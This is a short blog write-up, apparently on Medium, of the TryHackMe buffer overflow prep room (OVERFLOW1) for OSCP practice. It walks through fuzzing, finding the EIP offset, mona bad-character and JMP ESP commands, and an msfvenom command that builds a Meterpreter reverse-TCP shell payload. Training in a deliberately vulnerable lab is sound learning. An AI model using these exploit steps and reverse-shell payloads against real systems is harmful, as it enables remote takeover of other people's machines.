OSCP prep [Buffer Overflow]

Lavesh pashte
4 min readDec 29, 2020

Hello guys today we are going to solve a buffer overflow from tryhackme from room https://tryhackme.com/room/bufferoverflowprep

Im going to go over a single Buffer (OVERFLOW1) because the room is quite big and has many tasks .If you guys want to develop your skills further in buffer overflow do go through this room im sure it’ll help you guys a lot

To understand what im about to do needs a bit of previous working knowledge of buffer overflow..so be sure you understand basic buffer overflows first

So what i did was instead of using rdp and using different machine over the network i downloaded the oscp.exe from the remote machine and ran it on my windows machine .This step isn’t necessary i just did it to make myself more comfortable

so lets start

  1. lets run the application

2.So our target is OVERFLOW1 so lets open it in immunity debugger

3.so lets start by passing redundant data in order to crash the application

well it worked properly.Lets write a script to fuzz it

This is the script that im going to use

As you can see The offset is near 2100

EIP has been completely overwritten by our data

4.Lets create a cyclic pattern using msf module[msf-pattern_create]

Now we will send this data,you can send it using a script im going to do it manually

The most important thing right now is the EIP pointer,now take the data of EIP pointer which is 6F43396E,and use it with msf-pattern_offset it will provide you with the offset

5.Now we know what the offset is so lets begin with exploit development

After overflowing till the offset we will overwrite the EIP with BBBB which will be “42424242” in hex

6.Now lets find bad characters, for this we will use mona module

Lets create a bytearray using mona module
!mona bytearray -b ‘\x00’

This will create a bytearray excluding \x00 which is a termination byte and a bad character

You also have to use a bad character list in your exploit https://github.com/cytopia/badchars you can get it from this repository

Lets run the script

After the crash use
!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP pointer address>

As you can see we are getting badchars.There is one thing to look out for while doing this is that if 07 is corrupted then it can corrupt 08 as well so try to remove the first bad character and retry the whole process.

Now im going to remove all the badchars from my list and retry the whole process .Try again and again until you get something like this

after we got every bad character we procced to next step

7.jmp to esp

search for jmp esp instruction using mona module
!mona jmp -r esp -cpb <all the bad characters>

we are going to use the first one 0x625011af and convert it to endian format \xaf\x11\x50\x62
add this to our script or exploit


we are going to create a payload excluding the bad characters using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -b <bad characters> EXITFUNC=thread -f py -v payload

and add the exploit to the script

also add some padding using NOPS \x90

start listening

And voila we got a connection back